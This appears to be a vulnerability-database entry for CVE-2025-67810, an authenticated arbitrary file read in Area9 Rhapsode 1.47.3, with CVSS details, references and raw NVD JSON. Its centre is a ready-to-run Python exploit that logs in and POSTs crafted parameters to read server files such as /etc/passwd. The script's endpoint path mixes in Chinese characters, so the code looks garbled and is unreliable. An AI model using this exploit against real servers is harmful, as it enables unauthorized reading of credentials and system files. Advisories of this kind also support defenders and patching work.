CVE-2025-67810

Description

In Area9 Rhapsode 1.47.3, an authenticated attacker can exploit the operation, url, and filename parameters via POST request to read arbitrary files from the server filesystem. Fixed in 1.47.4 (#7254) and further versions.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:area9lyceum:rhapsode:1.47.3:*:*:*:*:*:*:* - VULNERABLE

Area9 Rhapsody < 1.47.4

Area9 Rhapsode 1.47.3及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-67810 PoC - Area9 Rhapsode Arbitrary File Read
# Author: Security Researcher
# Target: Area9 Rhapsode <= 1.47.3

def exploit(target_url, username, password, file_to_read):
    """
    Exploit arbitrary file read vulnerability in Area9 Rhapsode
    
    Args:
        target_url: Base URL of the vulnerable Area9 Rhapsode instance
        username: Valid user credentials (low privilege is sufficient)
        password: User password
        file_to_read: Path to file on the server to read (e.g., /etc/passwd)
    
    Returns:
        Content of the requested file
    """
    
    # Step 1: Authenticate and obtain session token
    login_url = f"{target_url}/api/login"
    login_data = {
        "username": username,
        "password": password
    }
    
    session = requests.Session()
    try:
        login_response = session.post(login_url, json=login_data)
        if login_response.status_code != 200:
            print(f"[-] Authentication failed: {login_response.status_code}")
            return None
        print("[+] Successfully authenticated")
    except requests.RequestException as e:
        print(f"[-] Connection error: {e}")
        return None
    
    # Step 2: Exploit arbitrary file read via POST request
    exploit_url = f"{target_url}/api/file操作"
    exploit_data = {
        "operation": "read",
        "url": file_to_read,
        "filename": "output.txt"
    }
    
    try:
        exploit_response = session.post(exploit_url, json=exploit_data)
        if exploit_response.status_code == 200:
            print(f"[+] Successfully read file: {file_to_read}")
            return exploit_response.text
        else:
            print(f"[-] Exploit failed: {exploit_response.status_code}")
            return None
    except requests.RequestException as e:
        print(f"[-] Request error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python cve-2025-67810.py <target_url> <username> <password> <file_path>")
        print("Example: python cve-2025-67810.py https://rhapsode.example.com admin password /etc/passwd")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    file_path = sys.argv[4]
    
    result = exploit(target, user, pwd, file_path)
    if result:
        print("\n[File Content]:")
        print(result)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67810
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67810
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67810/
[4] VulDB https://vuldb.com/cve/CVE-2025-67810
[5] https://area9.com
[6] https://security.area9lyceum.com/cve-2025-67810/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67810", "sourceIdentifier": "[email protected]", "published": "2026-01-09T20:15:51.887", "lastModified": "2026-02-10T19:45:24.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Area9 Rhapsode 1.47.3, an authenticated attacker can exploit the operation, url, and filename parameters via POST request to read arbitrary files from the server filesystem. Fixed in 1.47.4 (#7254) and further versions."}, {"lang": "es", "value": "En Area9 Rhapsode 1.47.3, un atacante autenticado puede explotar los parámetros operation, url y filename mediante una solicitud POST para leer archivos arbitrarios del sistema de archivos del servidor. Corregido en 1.47.4 (#7254) y versiones posteriores."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:area9lyceum:rhapsode:1.47.3:*:*:*:*:*:*:*", "matchCriteriaId": "B9B9C2BE-307B-4B8C-8D0E-E2F8EF707C6D"}]}]}], "references": [{"url": "https://area9.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://security.area9lyceum.com/cve-2025-67810/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}